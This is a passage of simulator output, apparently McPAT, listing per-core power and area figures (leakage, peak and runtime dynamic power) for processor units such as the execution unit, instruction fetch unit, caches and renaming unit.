'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.089134,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0844813,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.117214,
'Execution Unit/Register Files/Runtime Dynamic': 0.0959045,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.193074,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.580612,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.23455,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00111369,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00111369,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000991245,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000395333,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00121358,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00443221,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00991979,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0812141,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.16591,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.196522,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.275839,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.63514,
'Instruction Fetch Unit/Runtime Dynamic': 0.567928,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0392843,
'L2/Runtime Dynamic': 0.0211171,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.18256,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.45945,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0952921,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0952921,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.63255,
'Load Store Unit/Runtime Dynamic': 2.02469,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.234974,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.469948,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.083393,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0839726,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.321197,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0322477,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.620561,
'Memory Management Unit/Runtime Dynamic': 0.11622,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.1471,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.073866,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0131862,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.141616,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.228668,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.19318,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0388882,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.233233,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.233527,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.186629,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.301025,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.151947,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.639602,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.177646,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.56848,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0441183,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00782805,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0702095,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0578932,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.114328,
'Execution Unit/Register Files/Runtime Dynamic': 0.0657213,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.157636,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.412736,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.75667,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00109182,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00109182,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000980305,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000395536,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000831641,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00399558,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00942018,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0556542,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.54008,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.153712,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.189027,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.93041,
'Instruction Fetch Unit/Runtime Dynamic': 0.411809,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0390858,
'L2/Runtime Dynamic': 0.0187973,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.9809,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.879812,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0564154,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0564153,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.24731,
'Load Store Unit/Runtime Dynamic': 1.21445,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.139111,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.278221,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0493709,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0499272,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.220109,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0252896,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.461029,
'Memory Management Unit/Runtime Dynamic': 0.0752168,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8358,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.116055,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00983254,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0939402,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.219828,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.69677,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0519126,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.243463,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.239698,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.215457,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.347525,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.175419,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.738401,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.209671,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.67884,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0452841,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00903725,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
